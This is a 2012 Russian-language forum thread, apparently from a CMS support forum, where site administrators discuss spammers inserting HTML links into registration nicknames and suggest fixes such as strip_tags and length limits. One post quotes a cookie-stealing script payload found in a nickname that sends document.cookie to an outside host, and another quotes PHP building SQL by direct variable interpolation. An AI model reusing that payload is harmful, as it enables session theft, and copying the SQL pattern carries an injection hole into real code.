новые трюки спаммеров, как вылечить ?

#1 17 мая 2012 в 15:05
новые трюки спаммеров, как вылечить ?
при регистрации в Никнейм:
прописывают < a href="http:// муравсякая. ru/ " >спам< /a >
и ссылка работает.

как запретить прописать в Никнейм <a href="http://
#2 17 мая 2012 в 15:17
Я поступил очень просто, в инпуте ввода имени указал максимальное число символов — 15. Для любых Вась и Петь более чем достаточно.
#3 17 мая 2012 в 15:22
ха — такой же сегодня зарегался — пока просто удалил у него ссылку с ника и всё — дальше посмотрим
#4 17 мая 2012 в 15:25
какие молодцы однако спамеры (:
#5 17 мая 2012 в 15:26
Sergey Platonov, так может лучше сразу при изменении никнейма и при регистрации поставить strip_tags() glassesВсех не усмотришь…
#6 17 мая 2012 в 15:34
lezginka.ru, Воспользуйтесь preg_match на ник пользователя при регистрации и редактировании профиля.
#7 17 мая 2012 в 15:40


Sergey Platonov, так может лучше сразу при изменении никнейма и при регистрации поставить strip_tags() glassesВсех не усмотришь..

SJen

ну пока затихло, если будут долбиться, то придётся срочно бросать учёбу, искать время и прописывать функцию проверки ника при регистрации ещё и на это. а пока в долгий ящик откладывать придётся, если ктонить не сделает
#8 17 мая 2012 в 15:55
WALTERZ, а нельзя на пальцах объяснить, т.е. где и что менять?
#9 17 мая 2012 в 15:59
Странно, попробовал произвести регистрацию на 1.9 чистом — ссылка не работает.
Но если что, действительно проще будет:
  1. $nickname=strip_tags($nickname);
#10 17 мая 2012 в 16:03
lezginka.ru, вставьте этот код в frontend.php компонента регистрации
после:
  1. $group_id = $cfg['default_gid'] ? $cfg['default_gid'] : 1;
И в фронтенд компонента users, чтобы не хитрили также с настройками профилей… вставить ДО запроса в EDIT PROFILE:
  1. $sql = "UPDATE cms_user_profiles
  2. SET city = '$city',
  3. description = '$description',
  4. showmail='$showmail',
  5. showbirth='$showbirth',
  6. showicq='$showicq',
  7. allow_who='$allow_who',
  8. signature='$signature',
  9. gender='$gender' $forms_sql,
  10. email_newmsg='$email_newmsg',
  11. cm_subscribe='$cm_subscribe'
  12. WHERE user_id = '$id'";
  13. $inDB->query($sql) ;
#11 15 августа 2012 в 23:39
вижу в нике

  1. <script>img = new Image();img.src="http://antiha.h19.ru/s.gif?"+document.cookie;</script>;
логин

scriptimgnewimageimgsrchttpantihah19rusgifdocumentcookiescript


чтобы это значило?
#12 16 августа 2012 в 01:33
всем рекомендую ставить apache2-mpm-itk и это очень сильно повысит безопасность так как там скрипты работают с правами пользователя а не сервера
#13 17 августа 2012 в 04:21
Уважаемый WALTERZ не могли бы вы подсказать способ как запретить регистрировать новый аккаунт тому кто уже в бане. проверкой по ip (забаненных) конечно есть подтверждение аккаунта но, что стоит активировать его левой почтой или многочисленными проверками + инвайтый сильно замедляют развитие сайта
заранее спасибо за помощь.
PS думаю всем пригодится забанел 1 ip и все с него уже нету нарушений, конечно это не всем пойдет, но все же для меня лично было бы супер другие могу подумать с подсетями когда полностью какую то маску забанеть от греха.
#14 17 августа 2012 в 11:09

Уважаемый WALTERZ не могли бы вы подсказать способ как запретить регистрировать новый аккаунт тому кто уже в бане. проверкой по ip (забаненных) конечно есть подтверждение аккаунта но, что стоит активировать его левой почтой или многочисленными проверками + инвайтый сильно замедляют развитие сайта

Александр
С левыми телефоннными номерами сложней)))) их меньше)
#15 17 августа 2012 в 14:33
WALTERZ, спасибо огромное обновлюсь вашим способом! :)
eoleg, что это такое и как ставить))))
Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.

Похожие темы

Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.